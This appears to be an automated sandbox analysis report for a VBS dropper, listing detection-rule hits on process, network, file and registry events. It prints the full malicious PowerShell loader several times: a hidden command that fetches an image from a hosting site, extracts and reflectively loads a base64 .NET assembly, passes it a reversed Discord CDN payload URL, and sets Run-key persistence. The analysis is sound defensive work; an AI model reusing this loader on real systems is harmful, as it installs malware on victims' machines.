gTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetM
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
      Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7252, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\las.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\las.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\las.vbs", ProcessId: 7252, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\cognitivo.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7668, TargetFilename: C:\ProgramData\cognitivo.vbs
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7252, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7476, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs, ProcessId: 7668, ProcessName: powershell.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetM
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetM
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\las.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\las.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\las.vbs", ProcessId: 7252, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreD